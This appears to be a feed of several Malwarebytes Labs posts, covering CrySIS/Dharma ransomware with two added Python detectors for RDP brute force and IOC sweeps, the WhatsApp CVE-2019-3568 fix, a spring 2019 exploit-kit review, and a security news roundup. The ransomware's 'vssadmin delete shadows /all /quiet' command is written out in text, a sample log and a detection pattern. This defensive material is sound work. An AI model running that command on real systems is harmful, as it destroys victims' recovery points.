Once CrySIS has infected a system, it creates registry entries to maintain persistence and encrypts practically every file type, while skipping system and malware files. It performs the encryption routine using a strong encryption algorithm (AES-256 combined with RSA-1024 asymmetric encryption), which is applied to fixed, removable, and network drives.

Before the encryption routine, CrySIS deletes all the Windows Restore Points by running the vssadmin delete shadows /all /quiet command.

The Trojan that drops the ransomware collects the computer name and the number of encrypted files of certain types and sends this information to a remote C2 server controlled by the threat actor. On some Windows versions, it also attempts to run itself with administrator privileges, thus extending the list of files that can be encrypted.

After a successful RDP-based attack, it has been observed that before executing the ransomware payload, CrySIS uninstalls security software installed on the system.
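Two of the behaviours described in this section leave traces in Windows Security logs: the RDP brute-forcing mentioned under distribution (repeated failed remote-interactive logons from one source, then a success) and the vssadmin delete shadows command run before encryption. The following Python is an added example, not code from the Malwarebytes post, showing the detection logic a SIEM rule would apply to both. The one-line key=value log format below is a constructed simplification of event IDs 4625 (failed logon), 4624 (successful logon) and 4688 (process creation); real events are XML, and a 4688 event only carries the command line when command-line auditing is enabled. The IP addresses are from documentation ranges and the threshold and window are assumptions.

```python
# Added example (not from the Malwarebytes post): detection logic for RDP
# brute force followed by shadow-copy deletion, run over constructed log lines.
# The key=value line format is a constructed simplification of Windows
# Security events 4625/4624/4688; real events are XML.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+EventID=(?P<eid>\d+)\s*(?P<rest>.*)$")
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# vssadmin delete shadows, tolerant of vssadmin.exe, extra spaces and case.
SHADOW_DELETE_RE = re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b",
                              re.IGNORECASE)

# Constructed sample log (documentation IP ranges; last two lines out of order).
SAMPLE_LOG = """\
2019-05-10T02:14:05Z EventID=4625 LogonType=10 SrcIP=203.0.113.45 User=administrator
2019-05-10T02:14:11Z EventID=4625 LogonType=10 SrcIP=203.0.113.45 User=admin
2019-05-10T02:14:17Z EventID=4625 LogonType=10 SrcIP=203.0.113.45 User=backup
2019-05-10T02:14:20Z EventID=4625 LogonType=2 SrcIP=- User=alice
2019-05-10T02:14:23Z EventID=4625 LogonType=10 SrcIP=203.0.113.45 User=backup
2019-05-10T02:14:29Z EventID=4625 LogonType=10 SrcIP=203.0.113.45 User=backup
2019-05-10T02:14:35Z EventID=4625 LogonType=10 SrcIP=203.0.113.45 User=backup
2019-05-10T02:14:41Z EventID=4624 LogonType=10 SrcIP=203.0.113.45 User=backup
2019-05-10T02:15:00Z EventID=4688 User=alice CommandLine="vssadmin list shadows"
2019-05-10T02:30:12Z EventID=4625 LogonType=10 SrcIP=198.51.100.7 User=guest
2019-05-10T02:20:03Z EventID=4688 User=backup CommandLine="vssadmin  delete shadows /all /quiet"
"""


def parse_event(line: str):
    """Parse one constructed log line into a dict, or None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = {"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
          "eid": int(m["eid"])}
    for key, quoted, bare in KV_RE.findall(m["rest"]):
        ev[key] = bare or quoted
    return ev


def detect(lines, threshold=5, window=timedelta(seconds=60)):
    """Return alerts in time order.

    rdp_bruteforce         - >= threshold RDP (LogonType 10) failures from one
                             source IP inside `window`
    rdp_bruteforce_success - an RDP logon succeeds from a source already flagged
    shadow_copy_deletion   - vssadmin is used to delete Volume Shadow Copies
    """
    events = [e for e in (parse_event(l) for l in lines) if e]
    events.sort(key=lambda e: e["ts"])
    failures = defaultdict(list)   # source IP -> timestamps inside the window
    flagged = set()
    alerts = []
    for e in events:
        if e["eid"] == 4625 and e.get("LogonType") == "10":
            ip = e.get("SrcIP", "-")
            recent = [t for t in failures[ip] if e["ts"] - t <= window]
            recent.append(e["ts"])
            failures[ip] = recent
            if len(recent) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"rule": "rdp_bruteforce", "ip": ip,
                               "user": e.get("User"), "ts": e["ts"]})
        elif (e["eid"] == 4624 and e.get("LogonType") == "10"
              and e.get("SrcIP") in flagged):
            alerts.append({"rule": "rdp_bruteforce_success", "ip": e["SrcIP"],
                           "user": e.get("User"), "ts": e["ts"]})
        elif e["eid"] == 4688 and SHADOW_DELETE_RE.search(e.get("CommandLine", "")):
            alerts.append({"rule": "shadow_copy_deletion", "ip": None,
                           "user": e.get("User"), "ts": e["ts"]})
    return alerts


def run_sample():
    """Run the detections over the constructed sample log."""
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for a in run_sample():
        print(a["ts"].isoformat(), a["rule"], a["ip"], a["user"])
```

The success alert is the one worth paging on: a burst of failures alone is background noise on any Internet-exposed RDP port, but a success from the same source, followed minutes later by shadow-copy deletion, is the sequence this section describes. Note that "vssadmin list shadows" is deliberately not matched, since administrators run it legitimately.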

The ransom

When CrySIS has completed the encryption routine, it drops a ransom note on the desktop for the victim, providing two email addresses the victim can use to contact the attackers and pay the ransom. Some variants include one of the contact email addresses in the encrypted file names.

The ransom demand is usually around 1 Bitcoin, but there have been cases where pricing seems to have been adapted to match the revenue of the affected company. Financially sound companies often have to pay a larger ransomware sum.

[Image: CrySIS ransom note]

Some of the older variants of CrySIS can be decrypted using free tools that have been made available through the NoMoreRansom project.


While you do have a choice to deploy other software to remotely operate your work computers, RDP is essentially a safe and easy-to-use protocol with a client that comes pre-installed on Windows systems, as well as clients available for other operating systems. There are a few measures you can take to make it a lot harder to gain access to your network over unauthorized RDP connections:

  • Use Network Level Authentication (NLA).
  • Change the RDP port so port-scanners looking for open RDP ports will miss yours. By default, the server listens on port 3389 for both TCP and UDP.
  • Or use a Remote Desktop Gateway Server, which also gives you some additional security and operational benefits like 2FA. The logs of the RDP sessions can prove especially useful when you are trying to figure out what might have happened. As these logs are not on the compromised machine, they are harder to falsify by intruders.
  • Limit access to specific IPs, if possible. There should be no need for a whole lot of IPs that need RDP access.
  • There are several possibilities to elevate user privileges on Windows computers, even when using RDP, but all of the known methods have been patched. So, as always, make sure your systems are fully up-to-date and patched to prevent privilege elevation and other exploits from being used.
  • Use an effective and easy-to-deploy backup strategy. Relying on Restore Points doesn’t qualify as such and is utterly useless when the ransomware first deletes the restore points, as is the case with CrySIS.
  • Train your staff on the dangers of email attachments and downloading files from unofficial sources.
  • Finally, use a multi-layered, advanced security solution to protect your machines against ransomware attacks.
[Image: Malwarebytes quarantining Ransom.Crysis]


Ransom.Crysis has been known to append these extensions for encrypted files:

.crysis, .dharma, .wallet, .java, .adobe, .viper1, .write, .bip, .zzzzz, .viper2, .arrow, .gif, .xtbl, .onion, .cezar, .combo, .cesar, .cmb, .AUF, .arena, .brrr, .btc, .cobra, .gamma, .heets, .monro, .USA, .bkp, .xwx, .best, .bgtx, .boost, .waifu, .qwe, .ETH, .bet, ta, .air, .vanss, .888, .FUNNY, .amber, .gdb, .frend, .like, .KARLS, .xxxxx, .aqva, .lock, .korea, .plomb, .tron, .NWA, .AUDIT, .com, .cccmn, .azero, .Bear, .bk666, .fire, .stun, .myjob, .ms13, .war, .carcn, .risk, .btix, .bkpx, .he, .ets, .santa, .gate, .bizer, .LOVE, .LDPR, .MERS, .bat, .qbix, .aa1, and .wal

The following ransom note names have been found:

  • README.txt
  • Readme to restore your files.txt
  • Decryption instructions.txt
  • Files encrypted!!.txt
  • Info.hta

Common file hashes:

  • 0aaad9fd6d9de6a189e89709e052f06b
  • bd3e58a09341d6f40bf9178940ef6603
  • 38dd369ddf045d1b9e1bfbb15a463d4c
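The extension and ransom-note lists above are only useful if they can be swept across file shares and endpoints quickly. The following Python is an added example, not code from the Malwarebytes post, that walks a directory tree and reports matches against both lists. Because several of the extensions (.com, .gif, .bat, .java, .lock) and README.txt are common on clean systems, the scanner grades confidence: a name that also carries a bracketed contact address is graded high, following the note above that some variants include one of the contact email addresses in the encrypted file names (the exact bracket pattern is an assumption); a bare extension match is graded low. The sample files it builds are constructed for the demo.

```python
# Added example (not from the Malwarebytes post): sweep a directory tree for the
# CrySIS/Dharma indicators listed above. Sample files are constructed; the
# bracketed-email pattern is an assumption based on the note that some variants
# put a contact address in encrypted file names.
import re
import shutil
import tempfile
from collections import Counter
from pathlib import Path

# Extensions from the list above, normalised to lower case with a leading dot.
_EXT_LIST = """.crysis, .dharma, .wallet, .java, .adobe, .viper1, .write, .bip, .zzzzz,
.viper2, .arrow, .gif, .xtbl, .onion, .cezar, .combo, .cesar, .cmb, .AUF, .arena,
.brrr, .btc, .cobra, .gamma, .heets, .monro, .USA, .bkp, .xwx, .best, .bgtx,
.boost, .waifu, .qwe, .ETH, .bet, ta, .air, .vanss, .888, .FUNNY, .amber, .gdb,
.frend, .like, .KARLS, .xxxxx, .aqva, .lock, .korea, .plomb, .tron, .NWA, .AUDIT,
.com, .cccmn, .azero, .Bear, .bk666, .fire, .stun, .myjob, .ms13, .war, .carcn,
.risk, .btix, .bkpx, .he, .ets, .santa, .gate, .bizer, .LOVE, .LDPR, .MERS, .bat,
.qbix, .aa1, .wal"""
CRYSIS_EXTS = {("." + t.strip().lstrip(".")).lower()
               for t in _EXT_LIST.replace("\n", " ").split(",") if t.strip()}

# Ransom note names from the list above (compared case-insensitively, as NTFS would).
RANSOM_NOTES = {"readme.txt", "readme to restore your files.txt",
                "decryption instructions.txt", "files encrypted!!.txt", "info.hta"}
# Names legitimate software also ships; flag with low confidence only.
NOISY_NOTES = {"readme.txt"}

EMAIL_TAG_RE = re.compile(r"\[[^\[\]\s]+@[^\[\]\s]+\]")  # e.g. "[addr@example.com]"


def classify_file(path):
    """Return (kind, confidence) for one file name, or None if nothing matches."""
    path = Path(path)
    name = path.name.lower()
    if name in RANSOM_NOTES:
        return ("ransom_note", "low" if name in NOISY_NOTES else "high")
    if path.suffix.lower() in CRYSIS_EXTS:
        # Common extensions (.com, .gif, .bat, .java ...) are only convincing
        # when the name also carries the attacker contact address.
        conf = "high" if EMAIL_TAG_RE.search(path.name) else "low"
        return ("encrypted_file", conf)
    return None


def scan_tree(root) -> list:
    """Walk `root` and return one finding dict per matching file."""
    findings = []
    for p in sorted(Path(root).rglob("*")):
        if not p.is_file():
            continue
        hit = classify_file(p)
        if hit:
            findings.append({"path": str(p.relative_to(root)),
                             "kind": hit[0], "confidence": hit[1]})
    return findings


def build_sample_tree(root) -> None:
    """Create constructed files that exercise each branch of classify_file."""
    sample = [
        "docs/quarterly.xlsx.[restore@example.com].arrow",  # encrypted, high
        "docs/Files encrypted!!.txt",                        # note, high
        "docs/Info.hta",                                     # note, high
        "README.txt",                                        # note, low (noisy)
        "src/Main.java",                                     # ext match only, low
        "tools/legacy.com",                                  # ext match only, low
        "photos/cat.jpg",                                    # clean
    ]
    for rel in sample:
        f = Path(root) / rel
        f.parent.mkdir(parents=True, exist_ok=True)
        f.write_bytes(b"constructed sample content")


def demo() -> dict:
    """Build the sample tree in a temp dir, scan it, return counts keyed by
    (kind, confidence), then clean up."""
    root = tempfile.mkdtemp(prefix="crysis-ioc-")
    try:
        build_sample_tree(root)
        findings = scan_tree(root)
        return dict(Counter((f["kind"], f["confidence"]) for f in findings))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for (kind, conf), n in sorted(demo().items()):
        print(f"{kind:15} {conf:5} {n}")
```

On a real share, point scan_tree at the mount and treat any high-confidence hit, or a cluster of low-confidence hits in one directory, as a trigger to isolate the host that wrote them; a single .java or .com file is not evidence of anything.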

The post Threat spotlight: CrySIS, aka Dharma ransomware, causing a crisis for businesses appeared first on Malwarebytes Labs.

WhatsApp fix goes live after targeted attack on human rights lawyer

If you use WhatsApp, you’ll want to update both app and device as soon as possible due to a freshly-discovered exploit. The vulnerability was found in Google Android, Apple iOS, and Microsoft Windows Phone builds of the app.

Unlike in many mobile attacks, potential victims aren’t required to install or click on anything—they may not even be aware something malicious has taken place.

This attack came to light after CitizenLab suspected a human rights lawyer was being targeted; after observing the activity, it concluded that they were, but the attacks were blocked by the fixes WhatsApp had put in place.

We should stress these are smart, high-level attacks and not typically rolled out to target random people. No need to start panicking. Just apply fixes as required, and go about your day.

What typically happens with a mobile attack?

A large portion of mobile attacks usually involve some form of social engineering. Mobile manufacturers insist customers use their own closed ecosystem store to lessen the risk of becoming infected by something out in the wild.

For example, iPhone users can only download apps from iTunes. And Android devices have installs from third parties or unknown sources switched off by default. This means if your child ends up on a fake Angry Birds website offering up a bogus installer, they won’t be able to install the app because the device won’t allow it (unless you switched off the default settings).

While bad files can and do lurk on official mobile stores, ignoring unknown source installs definitely helps keep infection numbers down.

This sounds like a non-typical mobile hijack

That would definitely be the case.

The WhatsApp team worked out that a simple missed call was all it took to inject commercial spyware into the device. The call, made using WhatsApp’s voice call function, would lead to the infection being installed on the phone silently. It appears all record of the call log would be scrubbed too, so the victim wouldn’t even be aware something was amiss.

This is similar to how malware on the desktop will often delete files after the event to remain as stealthy as possible. When this happens, it can take a long time before someone realises what’s up. When they do, it’s usually too late, and the attackers have already reached their chosen objective.

What is the impact?

Whether your mobile device is used for something important or you do little beyond making calls, this exploit could do some serious damage. The spyware can scan messages and emails, alongside grabbing location data. Even if you think malware on your phone isn’t a big deal because you don’t do anything important on it, the attackers have something for everyone. Namely, the ability to turn on a phone’s microphone and camera, access photos, contacts, and more.

Given the stealthy way the attack was attempted, it’s impressive that WhatsApp caught it as quickly as they did. Engineers at Facebook have been busy sorting this one out over the weekend.

Is there an advisory?

There sure is. Named CVE-2019-3568, the advisory reads as follows:

Description: A buffer overflow vulnerability in WhatsApp VOIP stack allowed remote code execution via specially crafted series of SRTCP packets sent to a target phone number.

Affected Versions: The issue affects WhatsApp for Android prior to v2.19.134, WhatsApp Business for Android prior to v2.19.44, WhatsApp for iOS prior to v2.19.51, WhatsApp Business for iOS prior to v2.19.51, WhatsApp for Windows Phone prior to v2.18.348, and WhatsApp for Tizen prior to v2.18.15.

Last Updated: 2019-05-13

What do we do now?

In a word, update. If your apps and devices are set to update automatically, you should be good to go. If not, go and update manually as soon as possible. As mentioned earlier, you probably shouldn’t worry about having been infected, as it seems to have been a carefully targeted attack. There’s an excellent chance you’re not on the radar.

In fact, if your updates aren’t set to automatic, your immediate concerns should be about more mundane security threats. Please consider switching to automatic and save yourself needless worries.

For more information on general mobile security, feel free to check out our guide to spotting mobile phishes, and some simple tips for good mobile hygiene. With that, plus Malwarebytes’ security apps for Android and iOS, you should be good to go.

The post WhatsApp fix goes live after targeted attack on human rights lawyer appeared first on Malwarebytes Labs.

Exploit kits: spring 2019 review

Exploit kit activity remains fairly unchanged since our last winter review in terms of active distribution campaigns. But this spring edition will feature a new exploit kit and another atypical EK, in that it specifically goes after routers.

The main driver behind these drive-by download attacks is various malvertising chains with strong geolocation filtering. This explains why some exploit kits are less visible than others.

According to our telemetry, the US is by far the country most affected by exploit kits, while Spain and South Korea are leading in Europe and Asia, respectively.

Spring 2019 overview

  • Spelevo EK
  • Fallout EK
  • Magnitude EK
  • RIG EK
  • Underminer EK
  • Router EK


Internet Explorer’s CVE-2018-8174 and Flash Player’s CVE-2018-15982 are the most common vulnerabilities, while the older CVE-2018-4878 (Flash) is still used by some EKs.

Spelevo EK

Spelevo EK is a new exploit kit that was identified in March 2019 and features the most recent Flash exploit (CVE-2018-15982). Based on our internal tests, Spelevo’s Flash exploit will check for and avoid virtual machines before delivering its payload.

Payloads seen: PsiX Bot, IcedID

Fallout EK

Fallout EK is one of the more active exploit kits with some of the more intricate URI patterns. For a while, Fallout was loading its IE exploit via a GitHub PoC, but it eventually switched back to self-hosting.

Payloads seen: GandCrab, Raccoon Stealer, Baldr

Magnitude EK

Not a lot has changed for Magnitude EK during the past few months, as it continues to target a few Asia Pacific (APAC) countries, and exclusively drops its own Magniber ransomware.

Payload seen: Magniber ransomware

RIG EK

RIG EK is also one of the popular exploit kits enjoying a wide distribution via malvertising campaigns, such as Fobos. RIG still uses Flash’s CVE-2018-4878, which comes with its own artifacts.

Payloads seen: AZORult, Pitou, ElectrumDoSMiner

Underminer EK

Underminer EK is distinct from its counterparts for its overkill obfuscation of Internet Explorer and Flash exploits, but more importantly for its unorthodox Hidden Bee payload.

Payload seen: Hidden Bee

Router EK

Router exploit kits are not new (see DNSChanger EK), but they are quite dangerous, as they are part of drive-by attacks that alter your router’s DNS settings via cross-site request forgery (CSRF). The particular one we show here (Novidade) targets Brazilian users. The end goal is typically to redirect users to phishing websites with victims being none the wiser.

Payload seen: DNS changer


Malwarebytes users are protected against these exploit kits, thanks to our anti-exploit and web protection technologies. The animation below features Malwarebytes Endpoint Protection and Response, one of our business products, and shows how it blocks each of these attacks.

The post Exploit kits: spring 2019 review appeared first on Malwarebytes Labs.

A week in security (May 6 – 12)

Last week on Labs, we discussed what to do when you discover a data breach, how 5G could impact cybersecurity strategy, the top six takeaways for user privacy, vulnerabilities in financial mobile apps that put consumers and businesses at risk, and in our series about vital infrastructure, we highlighted threats that target financial institutions, fintech, and cryptocurrencies.

Other cybersecurity news

  • Mozilla announced their new add-on policies, which will go into effect June 10, 2019. The emphasis is that add-ons inform users about their intentions, and are not allowed to contain obfuscated code. (Source: Mozilla)
  • The FBI, working in conjunction with authorities in multiple nations, has arrested several individuals in connection with Deep Dot Web, a website that allegedly profiteered by taking commissions on referral links to dark web markets. (Source: Gizmodo)
  • An international malvertiser was extradited from the Netherlands to face hacking charges in New Jersey. The defendant conspired to expose millions of web users to malicious advertisements designed to hack and infect victims’ computers with malware. (Source: US Department of Justice)
  • In an attempt to allow users to block online tracking, Google has announced two new features—Improved SameSite Cookies and Fingerprinting Protection—that will be previewed by Google in the Chrome web browser later this year. (Source: The Hacker News)
  • A slew of high-severity flaws have been disclosed in the PrinterLogic printer management service, which could enable a remote attacker to execute code on workstations running the PrinterLogic agent. (Source: ThreatPost)
  • On Monday, May 6, accounting firm Wolters Kluwer started seeing technical anomalies in a number of their platforms and applications. After investigating, they discovered the installation of malware. As a precaution, they decided to take a broader range of platforms and applications offline. (Source: Wolters Kluwer)
  • After getting pounded with ransomware and malware for deploying distributed denial-of-service (DDoS) attacks, unpatched Confluence servers are now compromised to mine for cryptocurrency. (Source: Bleeping Computer)
  • The FBI is investigating a ransomware attack on Baltimore City’s network that shut down some of the city services. (Source: CBS Baltimore)
  • The Dharma ransomware tries to divert victims’ attention by using an old ESET tool. While the user is dealing with the installation of the ESET Remover, Dharma runs in the background. (Source: TechNadu)
  • The FBI and Department of Homeland Security have jointly issued a new Malware Analysis Report warning of the dangers of ELECTRICFISH, a tunneling tool used for traffic funneling and data exfiltration by a North Korean government hacking group. (Source: SCMagazine)

Stay safe, everyone!

The post A week in security (May 6 – 12) appeared first on Malwarebytes Labs.